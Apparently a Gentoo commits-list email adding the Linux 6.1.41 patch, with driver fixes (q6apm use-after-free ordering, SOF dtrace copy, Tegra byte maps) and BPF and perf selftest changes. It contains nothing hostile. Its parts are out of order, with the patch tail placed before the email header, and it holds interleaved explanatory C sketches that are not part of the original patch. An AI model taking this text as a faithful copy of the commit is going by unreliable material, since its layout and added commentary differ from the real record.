+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index b33104715c7ba..b7552b0df7c3c 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -507,12 +507,6 @@ static int fsl_sai_set_bclk(struct snd_soc_dai *dai, bool tx, u32 freq)
+ 				   savediv / 2 - 1);
+ 	}
+ 
+-	if (sai->soc_data->max_register >= FSL_SAI_MCTL) {
+-		/* SAI is in master mode at this point, so enable MCLK */
+-		regmap_update_bits(sai->regmap, FSL_SAI_MCTL,
+-				   FSL_SAI_MCTL_MCLK_EN, FSL_SAI_MCTL_MCLK_EN);
+-	}
+-
+ 	return 0;
+ }
+ 
+@@ -719,7 +713,7 @@ static void fsl_sai_config_disable(struct fsl_sai *sai, int dir)
+ 	u32 xcsr, count = 100;
+ 
+ 	regmap_update_bits(sai->regmap, FSL_SAI_xCSR(tx, ofs),
+-			   FSL_SAI_CSR_TERE, 0);
++			   FSL_SAI_CSR_TERE | FSL_SAI_CSR_BCE, 0);
+ 
+ 	/* TERE will remain set till the end of current frame */
+ 	do {
+diff --git a/sound/soc/fsl/fsl_sai.h b/sound/soc/fsl/fsl_sai.h
+index c5423f81e4560..caad5b0ac4ff4 100644
+--- a/sound/soc/fsl/fsl_sai.h
++++ b/sound/soc/fsl/fsl_sai.h
+@@ -91,6 +91,7 @@
+ /* SAI Transmit/Receive Control Register */
+ #define FSL_SAI_CSR_TERE	BIT(31)
+ #define FSL_SAI_CSR_SE		BIT(30)
++#define FSL_SAI_CSR_BCE		BIT(28)
+ #define FSL_SAI_CSR_FR		BIT(25)
+ #define FSL_SAI_CSR_SR		BIT(24)
+ #define FSL_SAI_CSR_xF_SHIFT	16
+diff --git a/sound/soc/qcom/qdsp6/q6apm.c b/sound/soc/qcom/qdsp6/q6apm.c
+index 794019286c704..16acdf3a99e1c 100644
+--- a/sound/soc/qcom/qdsp6/q6apm.c
++++ b/sound/soc/qcom/qdsp6/q6apm.c
+@@ -515,6 +515,8 @@ static int graph_callback(struct gpr_resp_pkt *data, void *priv, int op)
+ 
+ 	switch (hdr->opcode) {
+ 	case DATA_CMD_RSP_WR_SH_MEM_EP_DATA_BUFFER_DONE_V2:
++		if (!graph->ar_graph)
++			break;
+ 		client_event = APM_CLIENT_EVENT_DATA_WRITE_DONE;
+ 		mutex_lock(&graph->lock);
+ 		token = hdr->token & APM_WRITE_TOKEN_MASK;
+@@ -548,6 +550,8 @@ static int graph_callback(struct gpr_resp_pkt *data, void *priv, int op)
+ 		wake_up(&graph->cmd_wait);
+ 		break;
+ 	case DATA_CMD_RSP_RD_SH_MEM_EP_DATA_BUFFER_V2:
++		if (!graph->ar_graph)
++			break;
+ 		client_event = APM_CLIENT_EVENT_DATA_READ_DONE;
+ 		mutex_lock(&graph->lock);
+ 		rd_done = data->payload;
+@@ -650,8 +654,9 @@ int q6apm_graph_close(struct q6apm_graph *graph)
+ {
+ 	struct audioreach_graph *ar_graph = graph->ar_graph;
+ 
+-	gpr_free_port(graph->port);
++	graph->ar_graph = NULL;
+ 	kref_put(&ar_graph->refcount, q6apm_put_audioreach_graph);
++	gpr_free_port(graph->port);
+ 	kfree(graph);
+ 
+ 	return 0;
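
q6apm_graph_close() now clears graph->ar_graph before releasing the GPR port, and graph_callback() bails out when that pointer is NULL, so a late buffer-done event cannot touch a graph that is mid-teardown. A deliberately simplified sketch of that "disarm the shared pointer first" ordering; real code would also need locking or RCU, omitted here:

/* Teardown ordering sketch: clear the pointer callbacks test
 * before releasing the resource that can still fire them. */
#include <stddef.h>
#include <stdio.h>

struct graph { struct resource *res; };
struct resource { int dummy; };

static void callback(struct graph *g)
{
	if (!g->res)		/* close already started: ignore event */
		return;
	printf("event on live graph\n");
}

static void graph_close(struct graph *g, struct resource *r)
{
	g->res = NULL;		/* step 1: disarm callbacks */
	callback(g);		/* a late event is now harmless */
	(void)r;		/* step 2: then free the port/resource */
}

int main(void)
{
	struct resource r;
	struct graph g = { .res = &r };

	callback(&g);
	graph_close(&g, &r);
	return 0;
}
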
+diff --git a/sound/soc/qcom/qdsp6/topology.c b/sound/soc/qcom/qdsp6/topology.c
+index bd649c232a061..98b4d90a994a2 100644
+--- a/sound/soc/qcom/qdsp6/topology.c
++++ b/sound/soc/qcom/qdsp6/topology.c
+@@ -1100,8 +1100,8 @@ int audioreach_tplg_init(struct snd_soc_component *component)
+ 
+ 	ret = snd_soc_tplg_component_load(component, &audioreach_tplg_ops, fw);
+ 	if (ret < 0) {
+-		dev_err(dev, "tplg component load failed%d\n", ret);
+-		ret = -EINVAL;
++		if (ret != -EPROBE_DEFER)
++			dev_err(dev, "tplg component load failed: %d\n", ret);
+ 	}
+ 
+ 	release_firmware(fw);
+diff --git a/sound/soc/sof/ipc3-dtrace.c b/sound/soc/sof/ipc3-dtrace.c
+index b815b0244d9e4..8cf421577378c 100644
+--- a/sound/soc/sof/ipc3-dtrace.c
++++ b/sound/soc/sof/ipc3-dtrace.c
+@@ -187,7 +187,6 @@ static ssize_t dfsentry_trace_filter_write(struct file *file, const char __user
+ 	struct snd_sof_dfsentry *dfse = file->private_data;
+ 	struct sof_ipc_trace_filter_elem *elems = NULL;
+ 	struct snd_sof_dev *sdev = dfse->sdev;
+-	loff_t pos = 0;
+ 	int num_elems;
+ 	char *string;
+ 	int ret;
+@@ -202,11 +201,11 @@ static ssize_t dfsentry_trace_filter_write(struct file *file, const char __user
+ 	if (!string)
+ 		return -ENOMEM;
+ 
+-	/* assert null termination */
+-	string[count] = 0;
+-	ret = simple_write_to_buffer(string, count, &pos, from, count);
+-	if (ret < 0)
++	if (copy_from_user(string, from, count)) {
++		ret = -EFAULT;
+ 		goto error;
++	}
++	string[count] = '\0';
+ 
+ 	ret = trace_filter_parse(sdev, string, &num_elems, &elems);
+ 	if (ret < 0)
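
The dtrace hunk swaps simple_write_to_buffer() — which can copy fewer than count bytes and leave the tail uninitialized — for copy_from_user() with all-or-nothing error handling, and writes the terminating NUL only after a successful copy. The essential copy-then-terminate pattern, with memcpy() standing in for copy_from_user() in this userspace sketch:

/* Copy an unterminated user buffer, then NUL-terminate it. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static char *dup_user_string(const char *from, size_t count)
{
	char *string = malloc(count + 1);	/* +1 for the NUL */

	if (!string)
		return NULL;
	memcpy(string, from, count);		/* copy first ... */
	string[count] = '\0';			/* ... terminate after */
	return string;
}

int main(void)
{
	char raw[4] = { 'a', 'b', 'c', 'd' };	/* not NUL-terminated */
	char *s = dup_user_string(raw, sizeof(raw));

	if (s) {
		printf("%s\n", s);
		free(s);
	}
	return 0;
}
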
+diff --git a/sound/soc/tegra/tegra210_adx.c b/sound/soc/tegra/tegra210_adx.c
+index 49691d2cce509..dd3a2717f00d4 100644
+--- a/sound/soc/tegra/tegra210_adx.c
++++ b/sound/soc/tegra/tegra210_adx.c
+@@ -2,7 +2,7 @@
+ //
+ // tegra210_adx.c - Tegra210 ADX driver
+ //
+-// Copyright (c) 2021 NVIDIA CORPORATION.  All rights reserved.
++// Copyright (c) 2021-2023 NVIDIA CORPORATION.  All rights reserved.
+ 
+ #include <linux/clk.h>
+ #include <linux/device.h>
+@@ -175,10 +175,20 @@ static int tegra210_adx_get_byte_map(struct snd_kcontrol *kcontrol,
+ 	mc = (struct soc_mixer_control *)kcontrol->private_value;
+ 	enabled = adx->byte_mask[mc->reg / 32] & (1 << (mc->reg % 32));
+ 
++	/*
++	 * TODO: Simplify this logic to just return from bytes_map[]
++	 *
++	 * Presently below is required since bytes_map[] is
++	 * tightly packed and cannot store the control value of 256.
++	 * Byte mask state is used to know if 256 needs to be returned.
++	 * Note that for control value of 256, the put() call stores 0
++	 * in the bytes_map[] and disables the corresponding bit in
++	 * byte_mask[].
++	 */
+ 	if (enabled)
+ 		ucontrol->value.integer.value[0] = bytes_map[mc->reg];
+ 	else
+-		ucontrol->value.integer.value[0] = 0;
++		ucontrol->value.integer.value[0] = 256;
+ 
+ 	return 0;
+ }
+@@ -192,19 +202,19 @@ static int tegra210_adx_put_byte_map(struct snd_kcontrol *kcontrol,
+ 	int value = ucontrol->value.integer.value[0];
+ 	struct soc_mixer_control *mc =
+ 		(struct soc_mixer_control *)kcontrol->private_value;
++	unsigned int mask_val = adx->byte_mask[mc->reg / 32];
+ 
+-	if (value == bytes_map[mc->reg])
++	if (value >= 0 && value <= 255)
++		mask_val |= (1 << (mc->reg % 32));
++	else
++		mask_val &= ~(1 << (mc->reg % 32));
++
++	if (mask_val == adx->byte_mask[mc->reg / 32])
+ 		return 0;
+ 
+-	if (value >= 0 && value <= 255) {
+-		/* update byte map and enable slot */
+-		bytes_map[mc->reg] = value;
+-		adx->byte_mask[mc->reg / 32] |= (1 << (mc->reg % 32));
+-	} else {
+-		/* reset byte map and disable slot */
+-		bytes_map[mc->reg] = 0;
+-		adx->byte_mask[mc->reg / 32] &= ~(1 << (mc->reg % 32));
+-	}
++	/* Update byte map and slot */
++	bytes_map[mc->reg] = value % 256;
++	adx->byte_mask[mc->reg / 32] = mask_val;
+ 
+ 	return 1;
+ }
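
The tegra byte-map rewrite computes the would-be mask word first and returns 0 when nothing changes, and get() now reports 256 for disabled slots: control values 0-255 enable a slot, anything else disables it, and 256 is stored in the tightly packed bytes_map[] as 0. The bitmap bookkeeping reduced to a standalone sketch, mirroring the patch's logic (including that a write leaving the mask unchanged is reported as "no change"):

/* Slot-enable bookkeeping as in tegra210_adx_put_byte_map(). */
#include <stdio.h>

static unsigned int byte_mask[2];	/* 64 slots, one bit each */
static unsigned char bytes_map[64];

static int put_byte_map(unsigned int reg, int value)
{
	unsigned int mask_val = byte_mask[reg / 32];

	if (value >= 0 && value <= 255)
		mask_val |= 1u << (reg % 32);
	else
		mask_val &= ~(1u << (reg % 32));

	if (mask_val == byte_mask[reg / 32])
		return 0;			/* nothing to do */

	bytes_map[reg] = value % 256;		/* 256 is stored as 0 */
	byte_mask[reg / 32] = mask_val;
	return 1;				/* control value changed */
}

static int get_byte_map(unsigned int reg)
{
	/* Disabled slots read back as 256, the "disable" value */
	if (byte_mask[reg / 32] & (1u << (reg % 32)))
		return bytes_map[reg];
	return 256;
}

int main(void)
{
	printf("%d %d\n", put_byte_map(3, 42), get_byte_map(3));
	printf("%d %d\n", put_byte_map(3, 256), get_byte_map(3));
	return 0;
}
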
+diff --git a/sound/soc/tegra/tegra210_amx.c b/sound/soc/tegra/tegra210_amx.c
+index d064cc67fea66..a71c5916da791 100644
+--- a/sound/soc/tegra/tegra210_amx.c
++++ b/sound/soc/tegra/tegra210_amx.c
+@@ -2,7 +2,7 @@
+ //
+ // tegra210_amx.c - Tegra210 AMX driver
+ //
+-// Copyright (c) 2021 NVIDIA CORPORATION.  All rights reserved.
++// Copyright (c) 2021-2023 NVIDIA CORPORATION.  All rights reserved.
+ 
+ #include <linux/clk.h>
+ #include <linux/device.h>
+@@ -203,10 +203,20 @@ static int tegra210_amx_get_byte_map(struct snd_kcontrol *kcontrol,
+ 	else
+ 		enabled = amx->byte_mask[0] & (1 << reg);
+ 
++	/*
++	 * TODO: Simplify this logic to just return from bytes_map[]
++	 *
++	 * Presently below is required since bytes_map[] is
++	 * tightly packed and cannot store the control value of 256.
++	 * Byte mask state is used to know if 256 needs to be returned.
++	 * Note that for control value of 256, the put() call stores 0
++	 * in the bytes_map[] and disables the corresponding bit in
++	 * byte_mask[].
++	 */
+ 	if (enabled)
+ 		ucontrol->value.integer.value[0] = bytes_map[reg];
+ 	else
+-		ucontrol->value.integer.value[0] = 0;
++		ucontrol->value.integer.value[0] = 256;
+ 
+ 	return 0;
+ }
+@@ -221,25 +231,19 @@ static int tegra210_amx_put_byte_map(struct snd_kcontrol *kcontrol,
+ 	unsigned char *bytes_map = (unsigned char *)&amx->map;
+ 	int reg = mc->reg;
+ 	int value = ucontrol->value.integer.value[0];
++	unsigned int mask_val = amx->byte_mask[reg / 32];
+ 
+-	if (value == bytes_map[reg])
++	if (value >= 0 && value <= 255)
++		mask_val |= (1 << (reg % 32));
++	else
++		mask_val &= ~(1 << (reg % 32));
++
++	if (mask_val == amx->byte_mask[reg / 32])
+ 		return 0;
+ 
+-	if (value >= 0 && value <= 255) {
+-		/* Update byte map and enable slot */
+-		bytes_map[reg] = value;
+-		if (reg > 31)
+-			amx->byte_mask[1] |= (1 << (reg - 32));
+-		else
+-			amx->byte_mask[0] |= (1 << reg);
+-	} else {
+-		/* Reset byte map and disable slot */
+-		bytes_map[reg] = 0;
+-		if (reg > 31)
+-			amx->byte_mask[1] &= ~(1 << (reg - 32));
+-		else
+-			amx->byte_mask[0] &= ~(1 << reg);
+-	}
++	/* Update byte map and slot */
++	bytes_map[reg] = value % 256;
++	amx->byte_mask[reg / 32] = mask_val;
+ 
+ 	return 1;
+ }
+diff --git a/tools/perf/Makefile.config b/tools/perf/Makefile.config
+index 898226ea8cadc..fac6ba07eacdb 100644
+--- a/tools/perf/Makefile.config
++++ b/tools/perf/Makefile.config
+@@ -149,9 +149,9 @@ FEATURE_CHECK_LDFLAGS-libcrypto = -lcrypto
+ ifdef CSINCLUDES
+   LIBOPENCSD_CFLAGS := -I$(CSINCLUDES)
+ endif
+-OPENCSDLIBS := -lopencsd_c_api
++OPENCSDLIBS := -lopencsd_c_api -lopencsd
+ ifeq ($(findstring -static,${LDFLAGS}),-static)
+-  OPENCSDLIBS += -lopencsd -lstdc++
++  OPENCSDLIBS += -lstdc++
+ endif
+ ifdef CSLIBS
+   LIBOPENCSD_LDFLAGS := -L$(CSLIBS)
+diff --git a/tools/perf/tests/shell/test_uprobe_from_different_cu.sh b/tools/perf/tests/shell/test_uprobe_from_different_cu.sh
+new file mode 100644
+index 0000000000000..00d2e0e2e0c28
+--- /dev/null
++++ b/tools/perf/tests/shell/test_uprobe_from_different_cu.sh
+@@ -0,0 +1,77 @@
++#!/bin/bash
++# test perf probe of function from different CU
++# SPDX-License-Identifier: GPL-2.0
++
++set -e
++
++temp_dir=$(mktemp -d /tmp/perf-uprobe-different-cu-sh.XXXXXXXXXX)
++
++cleanup()
++{
++	trap - EXIT TERM INT
++	if [[ "${temp_dir}" =~ ^/tmp/perf-uprobe-different-cu-sh.*$ ]]; then
++		echo "--- Cleaning up ---"
++		perf probe -x ${temp_dir}/testfile -d foo
++		rm -f "${temp_dir}/"*
++		rmdir "${temp_dir}"
++	fi
++}
++
++trap_cleanup()
++{
++	cleanup
++	exit 1
++}
++
++trap trap_cleanup EXIT TERM INT
++
++cat > ${temp_dir}/testfile-foo.h << EOF
++struct t
++{
++  int *p;
++  int c;
++};
++
++extern int foo (int i, struct t *t);
++EOF
++
++cat > ${temp_dir}/testfile-foo.c << EOF
++#include "testfile-foo.h"
++
++int
++foo (int i, struct t *t)
++{
++  int j, res = 0;
++  for (j = 0; j < i && j < t->c; j++)
++    res += t->p[j];
++
++  return res;
++}
++EOF
++
++cat > ${temp_dir}/testfile-main.c << EOF
++#include "testfile-foo.h"
++
++static struct t g;
++
++int
++main (int argc, char **argv)
++{
++  int i;
++  int j[argc];
++  g.c = argc;
++  g.p = j;
++  for (i = 0; i < argc; i++)
++    j[i] = (int) argv[i][0];
++  return foo (3, &g);
++}
++EOF
++
++gcc -g -Og -flto -c ${temp_dir}/testfile-foo.c -o ${temp_dir}/testfile-foo.o
++gcc -g -Og -c ${temp_dir}/testfile-main.c -o ${temp_dir}/testfile-main.o
++gcc -g -Og -o ${temp_dir}/testfile ${temp_dir}/testfile-foo.o ${temp_dir}/testfile-main.o
++
++perf probe -x ${temp_dir}/testfile --funcs foo
++perf probe -x ${temp_dir}/testfile foo
++
++cleanup
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index 18e319e6ce335..d1ab5f23f4e4c 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -181,9 +181,9 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 				e = i - 1;
+ 		} else {
+ 			if (i >= 4)
+-				e = i - 4;
+-			else if (i == 3)
+-				e = i - 2;
++				e = i - 3;
++			else if (i >= 1)
++				e = i - 1;
+ 			else
+ 				e = 0;
+ 		}
+diff --git a/tools/testing/selftests/bpf/prog_tests/align.c b/tools/testing/selftests/bpf/prog_tests/align.c
+index de27a29af2703..8baebb41541dc 100644
+--- a/tools/testing/selftests/bpf/prog_tests/align.c
++++ b/tools/testing/selftests/bpf/prog_tests/align.c
+@@ -2,7 +2,7 @@
+ #include <test_progs.h>
+ 
+ #define MAX_INSNS	512
+-#define MAX_MATCHES	16
++#define MAX_MATCHES	24
+ 
+ struct bpf_reg_match {
+ 	unsigned int line;
+@@ -267,6 +267,7 @@ static struct bpf_align_test tests[] = {
+ 			 */
+ 			BPF_MOV64_REG(BPF_REG_5, BPF_REG_2),
+ 			BPF_ALU64_REG(BPF_ADD, BPF_REG_5, BPF_REG_6),
++			BPF_MOV64_REG(BPF_REG_4, BPF_REG_5),
+ 			BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, 14),
+ 			BPF_MOV64_REG(BPF_REG_4, BPF_REG_5),
+ 			BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 4),
+@@ -280,6 +281,7 @@ static struct bpf_align_test tests[] = {
+ 			BPF_MOV64_REG(BPF_REG_5, BPF_REG_2),
+ 			BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, 14),
+ 			BPF_ALU64_REG(BPF_ADD, BPF_REG_5, BPF_REG_6),
++			BPF_MOV64_REG(BPF_REG_4, BPF_REG_5),
+ 			BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, 4),
+ 			BPF_ALU64_REG(BPF_ADD, BPF_REG_5, BPF_REG_6),
+ 			BPF_MOV64_REG(BPF_REG_4, BPF_REG_5),
+@@ -311,44 +313,52 @@ static struct bpf_align_test tests[] = {
+ 			{15, "R4=pkt(id=1,off=18,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			{15, "R5=pkt(id=1,off=14,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* Variable offset is added to R5 packet pointer,
+-			 * resulting in auxiliary alignment of 4.
++			 * resulting in auxiliary alignment of 4. To avoid BPF
++			 * verifier's precision backtracking logging
++			 * interfering we also have a no-op R4 = R5
++			 * instruction to validate R5 state. We also check
++			 * that R4 is what it should be in such case.
+ 			 */
+-			{17, "R5_w=pkt(id=2,off=0,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{18, "R4_w=pkt(id=2,off=0,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{18, "R5_w=pkt(id=2,off=0,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* Constant offset is added to R5, resulting in
+ 			 * reg->off of 14.
+ 			 */
+-			{18, "R5_w=pkt(id=2,off=14,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{19, "R5_w=pkt(id=2,off=14,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* At the time the word size load is performed from R5,
+ 			 * its total fixed offset is NET_IP_ALIGN + reg->off
+ 			 * (14) which is 16.  Then the variable offset is 4-byte
+ 			 * aligned, so the total offset is 4-byte aligned and
+ 			 * meets the load's requirements.
+ 			 */
+-			{23, "R4=pkt(id=2,off=18,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
+-			{23, "R5=pkt(id=2,off=14,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
++			{24, "R4=pkt(id=2,off=18,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
++			{24, "R5=pkt(id=2,off=14,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* Constant offset is added to R5 packet pointer,
+ 			 * resulting in reg->off value of 14.
+ 			 */
+-			{25, "R5_w=pkt(off=14,r=8"},
++			{26, "R5_w=pkt(off=14,r=8"},
+ 			/* Variable offset is added to R5, resulting in a
+-			 * variable offset of (4n).
++			 * variable offset of (4n). See comment for insn #18
++			 * for R4 = R5 trick.
+ 			 */
+-			{26, "R5_w=pkt(id=3,off=14,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{28, "R4_w=pkt(id=3,off=14,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{28, "R5_w=pkt(id=3,off=14,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* Constant is added to R5 again, setting reg->off to 18. */
+-			{27, "R5_w=pkt(id=3,off=18,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{29, "R5_w=pkt(id=3,off=18,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* And once more we add a variable; resulting var_off
+ 			 * is still (4n), fixed offset is not changed.
+ 			 * Also, we create a new reg->id.
+ 			 */
+-			{28, "R5_w=pkt(id=4,off=18,r=0,umax=2040,var_off=(0x0; 0x7fc)"},
++			{31, "R4_w=pkt(id=4,off=18,r=0,umax=2040,var_off=(0x0; 0x7fc)"},
++			{31, "R5_w=pkt(id=4,off=18,r=0,umax=2040,var_off=(0x0; 0x7fc)"},
+ 			/* At the time the word size load is performed from R5,
+ 			 * its total fixed offset is NET_IP_ALIGN + reg->off (18)
+ 			 * which is 20.  Then the variable offset is (4n), so
+ 			 * the total offset is 4-byte aligned and meets the
+ 			 * load's requirements.
+ 			 */
+-			{33, "R4=pkt(id=4,off=22,r=22,umax=2040,var_off=(0x0; 0x7fc)"},
+-			{33, "R5=pkt(id=4,off=18,r=22,umax=2040,var_off=(0x0; 0x7fc)"},
++			{35, "R4=pkt(id=4,off=22,r=22,umax=2040,var_off=(0x0; 0x7fc)"},
++			{35, "R5=pkt(id=4,off=18,r=22,umax=2040,var_off=(0x0; 0x7fc)"},
+ 		},
+ 	},
+ 	{
+@@ -681,6 +691,6 @@ void test_align(void)
+ 		if (!test__start_subtest(test->descr))
+ 			continue;
+ 
+-		CHECK_FAIL(do_test_single(test));
++		ASSERT_OK(do_test_single(test), test->descr);
+ 	}
+ }
+diff --git a/tools/testing/selftests/bpf/prog_tests/sk_assign.c b/tools/testing/selftests/bpf/prog_tests/sk_assign.c
+index 3e190ed639767..1374b626a9858 100644
+--- a/tools/testing/selftests/bpf/prog_tests/sk_assign.c
++++ b/tools/testing/selftests/bpf/prog_tests/sk_assign.c
+@@ -29,7 +29,23 @@ static int stop, duration;
+ static bool
+ configure_stack(void)
+ {
++	char tc_version[128];
+ 	char tc_cmd[BUFSIZ];
++	char *prog;
++	FILE *tc;
++
++	/* Check whether tc is built with libbpf. */
++	tc = popen("tc -V", "r");
++	if (CHECK_FAIL(!tc))
++		return false;
++	if (CHECK_FAIL(!fgets(tc_version, sizeof(tc_version), tc)))
++		return false;
++	if (strstr(tc_version, ", libbpf "))
++		prog = "test_sk_assign_libbpf.bpf.o";
++	else
++		prog = "test_sk_assign.bpf.o";
++	if (CHECK_FAIL(pclose(tc)))
++		return false;
+ 
+ 	/* Move to a new networking namespace */
+ 	if (CHECK_FAIL(unshare(CLONE_NEWNET)))
+@@ -46,8 +62,8 @@ configure_stack(void)
+ 	/* Load qdisc, BPF program */
+ 	if (CHECK_FAIL(system("tc qdisc add dev lo clsact")))
+ 		return false;
+-	sprintf(tc_cmd, "%s %s %s %s", "tc filter add dev lo ingress bpf",
+-		       "direct-action object-file ./test_sk_assign.bpf.o",
++	sprintf(tc_cmd, "%s %s %s %s %s", "tc filter add dev lo ingress bpf",
++		       "direct-action object-file", prog,
+ 		       "section tc",
+ 		       (env.verbosity < VERBOSE_VERY) ? " 2>/dev/null" : "verbose");
+ 	if (CHECK(system(tc_cmd), "BPF load failed;",
+@@ -129,15 +145,12 @@ get_port(int fd)
+ static ssize_t
+ rcv_msg(int srv_client, int type)
+ {
+-	struct sockaddr_storage ss;
+ 	char buf[BUFSIZ];
+-	socklen_t slen;
+ 
+ 	if (type == SOCK_STREAM)
+ 		return read(srv_client, &buf, sizeof(buf));
+ 	else
+-		return recvfrom(srv_client, &buf, sizeof(buf), 0,
+-				(struct sockaddr *)&ss, &slen);
++		return recvfrom(srv_client, &buf, sizeof(buf), 0, NULL, NULL);
+ }
+ 
+ static int
+diff --git a/tools/testing/selftests/bpf/progs/connect4_prog.c b/tools/testing/selftests/bpf/progs/connect4_prog.c
+index ec25371de789d..7ef49ec04838d 100644
+--- a/tools/testing/selftests/bpf/progs/connect4_prog.c
++++ b/tools/testing/selftests/bpf/progs/connect4_prog.c
+@@ -32,7 +32,7 @@
+ #define IFNAMSIZ 16
+ #endif
+ 
+-__attribute__ ((noinline))
++__attribute__ ((noinline)) __weak
+ int do_bind(struct bpf_sock_addr *ctx)
+ {
+ 	struct sockaddr_in sa = {};
+diff --git a/tools/testing/selftests/bpf/progs/test_sk_assign.c b/tools/testing/selftests/bpf/progs/test_sk_assign.c
+index 98c6493d9b91d..21b19b758c4eb 100644
+--- a/tools/testing/selftests/bpf/progs/test_sk_assign.c
++++ b/tools/testing/selftests/bpf/progs/test_sk_assign.c
+@@ -16,6 +16,16 @@
+ #include <bpf/bpf_helpers.h>
+ #include <bpf/bpf_endian.h>
+ 
++#if defined(IPROUTE2_HAVE_LIBBPF)
++/* Use a new-style map definition. */
++struct {
++	__uint(type, BPF_MAP_TYPE_SOCKMAP);
++	__type(key, int);
++	__type(value, __u64);
++	__uint(pinning, LIBBPF_PIN_BY_NAME);
++	__uint(max_entries, 1);
++} server_map SEC(".maps");
++#else
+ /* Pin map under /sys/fs/bpf/tc/globals/<map name> */
+ #define PIN_GLOBAL_NS 2
+ 
+@@ -35,6 +45,7 @@ struct {
+ 	.max_elem = 1,
+ 	.pinning = PIN_GLOBAL_NS,
+ };
++#endif
+ 
+ char _license[] SEC("license") = "GPL";
+ 
+diff --git a/tools/testing/selftests/bpf/progs/test_sk_assign_libbpf.c b/tools/testing/selftests/bpf/progs/test_sk_assign_libbpf.c
+new file mode 100644
+index 0000000000000..dcf46adfda041
+--- /dev/null
++++ b/tools/testing/selftests/bpf/progs/test_sk_assign_libbpf.c
+@@ -0,0 +1,3 @@
++// SPDX-License-Identifier: GPL-2.0
++#define IPROUTE2_HAVE_LIBBPF
++#include "test_sk_assign.c"
+diff --git a/tools/testing/selftests/tc-testing/config b/tools/testing/selftests/tc-testing/config
+index aec4de8bea78b..0c3978fd6bcc9 100644
+--- a/tools/testing/selftests/tc-testing/config
++++ b/tools/testing/selftests/tc-testing/config
+@@ -5,6 +5,8 @@ CONFIG_NF_CONNTRACK=m
+ CONFIG_NF_CONNTRACK_MARK=y
+ CONFIG_NF_CONNTRACK_ZONES=y
+ CONFIG_NF_CONNTRACK_LABELS=y
++CONFIG_NF_CONNTRACK_PROCFS=y
++CONFIG_NF_FLOW_TABLE=m
+ CONFIG_NF_NAT=m
+ CONFIG_NETFILTER_XT_TARGET_LOG=m
+ 
+diff --git a/tools/testing/selftests/tc-testing/settings b/tools/testing/selftests/tc-testing/settings
+new file mode 100644
+index 0000000000000..e2206265f67c7
+--- /dev/null
++++ b/tools/testing/selftests/tc-testing/settings
+@@ -0,0 +1 @@
++timeout=900


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-24 20:27 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-24 20:27 UTC (permalink / raw)
  To: gentoo-commits

commit:     902923f3e529e47f769727e5dcb73e64e9397029
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Jul 24 20:26:48 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Jul 24 20:26:48 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=902923f3

Linux patch 6.1.41

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1040_linux-6.1.41.patch | 310 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 314 insertions(+)

diff --git a/0000_README b/0000_README
index e1e77420..3a1ce4bc 100644
--- a/0000_README
+++ b/0000_README
@@ -203,6 +203,10 @@ Patch:  1039_linux-6.1.40.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.40
 
+Patch:  1040_linux-6.1.41.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.41
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1040_linux-6.1.41.patch b/1040_linux-6.1.41.patch
new file mode 100644
index 00000000..55534ffd
--- /dev/null
+++ b/1040_linux-6.1.41.patch
@@ -0,0 +1,310 @@
+diff --git a/Makefile b/Makefile
+index 2bb0c01391a98..6c940cce3656a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 40
++SUBLEVEL = 41
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/x86/include/asm/microcode.h b/arch/x86/include/asm/microcode.h
+index 79b1d009e34e4..19a0b4005ffa8 100644
+--- a/arch/x86/include/asm/microcode.h
++++ b/arch/x86/include/asm/microcode.h
+@@ -5,6 +5,7 @@
+ #include <asm/cpu.h>
+ #include <linux/earlycpio.h>
+ #include <linux/initrd.h>
++#include <asm/microcode_amd.h>
+ 
+ struct ucode_patch {
+ 	struct list_head plist;
+diff --git a/arch/x86/include/asm/microcode_amd.h b/arch/x86/include/asm/microcode_amd.h
+index e6662adf3af4d..9675c621c1ca4 100644
+--- a/arch/x86/include/asm/microcode_amd.h
++++ b/arch/x86/include/asm/microcode_amd.h
+@@ -48,11 +48,13 @@ extern void __init load_ucode_amd_bsp(unsigned int family);
